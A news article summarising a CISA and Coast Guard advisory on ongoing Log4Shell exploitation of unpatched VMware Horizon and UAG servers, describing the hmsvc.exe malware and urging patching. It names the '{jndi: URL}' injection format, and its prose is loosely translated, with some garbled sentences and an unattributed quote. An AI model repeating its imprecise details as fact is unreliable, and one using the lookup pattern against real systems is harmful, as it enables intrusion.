The US Cyber Security and Infrastructure Agency (CISA) and the US Coast Guard Cyber Command (CGCYBER) announced through a cyber security advisory (CSA) that Log4Shell vulnerabilities (CVE-2021-44228) are still being exploited by hackers.
Of the hacker groups that have been detected who are still exploiting the vulnerability this "APT" and it has been found that have been attacking on VMware Horizon servers and Unified Access Gateway (UAG) to gain initial access to organizations that have not applied available patches.
The CSA provides information, including tactics, techniques, and procedures and indicators of compromise, derived from two related incident response engagements and malware analysis of samples discovered on victim networks.
For those who do not knowe Log4Shell, you should know that this is a vulnerability which first surfaced in December and actively targeted vulnerabilities found in Apache Log4j, which is characterized as a popular framework for organizing logging in Java applications, allowing arbitrary code to be executed when a specially formatted value is written to the registry in the format "{jndi: URL}".
Vulnerability It is notable because the attack can be carried out in Java applications thatThey record values obtained from external sources, for example by displaying problematic values in error messages.
It is observed that almost all projects that use frameworks like Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected, including Steam, Apple iCloud, Minecraft clients and servers.
The full alert details several recent cases where hackers have successfully exploited the vulnerability to gain access. In at least one confirmed compromise, the actors collected and extracted sensitive information from the victim's network.
Threat search conducted by the US Coast Guard Cyber Command shows that threat actors exploited Log4Shell to gain initial network access from an undisclosed victim. They uploaded a “hmsvc.exe.” malware file, which masquerades as the Microsoft Windows SysInternals LogonSessions security utility.
An executable embedded within the malware contains various capabilities, including keystroke logging and implementation of additional payloads, and provides a graphical user interface to access the victim's Windows desktop system. It can function as a command-and-control tunneling proxy, allowing a remote operator to reach further into a network, the agencies say.
The analysis also found that hmsvc.exe was running as a local system account with the highest possible privilege level, but did not explain how the attackers elevated their privileges to that point.
CISA and the Coast Guard recommend that all organizations install updated builds to ensure that VMware Horizon and UAG systems affected run the latest version.
The alert added that organizations should always keep software up to date and prioritize patching known exploited vulnerabilities. Internet-facing attack surfaces should be minimized by hosting essential services in a segmented demilitarized zone.
“Based on the number of Horizon servers in our data set that are not patched (only 18% were patched as of last Friday night), there is a high risk that this will seriously impact hundreds, if not thousands, of businesses. . This weekend also marks the first time we've seen evidence of widespread escalation, going from gaining initial access to beginning to take hostile action on Horizon servers."
Doing so ensures strict access controls to the network perimeter and does not host Internet-facing services that are not essential to business operations.
CISA and CGCYBER encourage users and administrators to update all affected VMware Horizon and UAG systems to the latest versions. If the updates or workarounds were not applied immediately after the release of VMware updates for Log4Shell , treat all affected VMware systems as compromised. See CSA Malicious Cyber Actors Continue to Exploit Log4Shell on VMware Horizon Systems for more information and additional recommendations.
Finally if you are interested in knowing more about it, you can check the details In the following link.